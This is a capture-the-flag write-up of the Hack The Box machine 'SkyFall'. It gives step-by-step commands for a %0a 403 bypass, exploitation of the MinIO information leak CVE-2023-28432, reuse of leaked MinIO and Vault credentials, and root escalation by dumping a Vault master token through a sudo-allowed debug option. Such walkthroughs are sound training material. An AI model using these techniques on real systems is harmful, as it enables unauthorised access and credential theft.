SkyFall Insane HTB WriteUp | HacktheBox

Introduction

In this post, Let’s see how to CTF SkyFall from HTB, If you have any doubts comment down below 👇🏾

Hacking Phases in SkyFall

  • Add IP to /etc/hosts
  • Nmap Scan
  • Site Enumeration
  • Credential Harvest
  • User Enumeration
  • Privilege Escalation

Let’s Begin

Hey you ❤️ Please check out my other posts, You will be amazed and support me by following on youtube.

Let’s Hack Skyfall HTB 😌

https://www.youtube.com/@techyrick-/videos

Add IP to /etc/hosts

Add domain skyfall.htb to /etc/hosts

sudo nano /etc/hosts

Nmap Scan

Let’s do a Nmap Scan

nmap -A 10.10.11.254 -Pn

Let’s also do a subdomain enumeration, We can use Gobuster to discover subdomains.

gobuster dns -d skyfall.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -t 20

We discovered a subdomain, demo.skyfall.htb, which appears to be listed in the host file.

Site Enumeration

We can use the default credentials to log in.

guest:guest

Credential Harvest

On the left panel, we can see Min10 Metrics. When we attempt to access Min10 Metrics, it shows a 403 forbidden error. So, I bypassed it by adding %0a at the end of the URL.

http://demo.skyfall.htb/metrics%0a

We can see a URL at the endpoint.

http://prd23-s3-backend.skyfall.htb/minio/v2/metrics/cluster

Please add “prd23-s3-backend.skyfall.htb” to the /etc/hosts file. We’ve identified a vulnerability, CVE-2023–28432, and there’s a GitHub Proof of Concept (PoC) available.

We need to test this “Information Leak Vulnerability” regarding Minio. With this vulnerability, it’s possible to discover some credentials related to Minio. Use BurpSuite to intercept and retrieve the credentials.

"MINIO_ROOT_USER": "5GrE1B2YGGyZzNHZaIww"
"MINIO_ROOT_PASSWORD": "GkpjkmiVmpFuL2d3oRx0"

To install the Min10 client, now let’s execute the Min10 client.

./mc alias set myminio http://prd23-s3-backend.skyfall.htb/ 5GrE1B2YGGyZzNHZaIww GkpjkmiVmpFuL2d3oRx0

Let’s check for files.

./mc ls -r --versions myminio

Here we can find some backup files with the .gz extension. I attempted to download those files and decompress them.

./mc cp --vid 2b75346d-2a47-4203-ab09-3c9f878466b8 myminio/askyy/home_backup.tar.gz .
ls -la
tar -xzvf home_backup.tar.gz

User Enumeration

Upon further enumeration of files with the .gz extension, we found these.

export VAULT_API_ADDR="http://prd23-vault-internal.skyfall.htb/"
export VAULT_TOKEN="hvs.CAESIJlU9JMYEhOPYv4igdhm9PnZDrabYTobQ4Ymnlq1qY-LGh4KHGh2cy43OVRNMnZhakZDRlZGdGVzN09xYkxTQVE"

To install Vault, add “prd23-vault-internal.skyfall.htb” to the /etc/hosts file. Then, run the command as follows.

export VAULT_ADDR="http://prd23-vault-internal.skyfall.htb/" export VAULT_TOKEN="hvs.CAESIJlU9JMYEhOPYv4igdhm9PnZDrabYTobQ4Ymnlq1qY-LGh4KHGh2cy43OVRNMnZhakZDRlZGdGVzN09xYkxTQVE"
./vault login

Firstly, import the configuration file into Vault, and then verify that the token value is valid.

To obtain user access, execute the following code. An OTP will be generated, and use the OTP as the password for the SSH connection.

./vault ssh -role dev_otp_key_role -mode otp askyy@10.10.11.254

Privilege Escalation

sudo -l

I executed root/vault/vault-unseal -c /etc/vault-unseal.yaml

sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -v

We observed that a master token is being generated. We need to copy that to a log file. Therefore, we need to create a .log file in the current directory.

touch debug.log
chown askyy:askyy debug.log
ls -la

Grant the user’s claim permissions to access debug.log.

Now the debug.log file can be written to by askyy. Please execute the following command.

sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -d -v /home/askyy/debug.log

The master token has been written to the debug.log file. Please read the debug.log file.

cat debug.log

Now we are successfully connected to Vault. We can attempt to log in as the user askyy using the same method as before.

export VAULT_ADDR="http://prd23-vault-internal.skyfall.htb/"
export VAULT_TOKEN="hvs.I0ewVsmaKU1SwVZAKR3T0mmG"

To gain root access, execute the following code. An OTP will be generated, and use the OTP as the password for the SSH connection.

./vault ssh -role admin_otp_key_role -mode otp root@10.10.11.254

Conclusion

In conclusion, the Skyfall box presented a series of challenges and vulnerabilities to navigate through, including subdomain discovery, exploitation of CVEs, and leveraging tools like Vault for access management.

Through enumeration, exploitation, and careful manipulation of configurations, various levels of access were achieved, showcasing the importance of thorough reconnaissance and exploitation techniques in penetration testing scenarios.


Share your love
Ads Blocker Image Powered by Code Help Pro

Ads Blocker Detected!!!

We have detected that you are using extensions or brave browser to block ads. Please support us by disabling these ads blocker.Our website is made possible by displaying Ads hope you whitelist our site. We use very minimal Ads in our site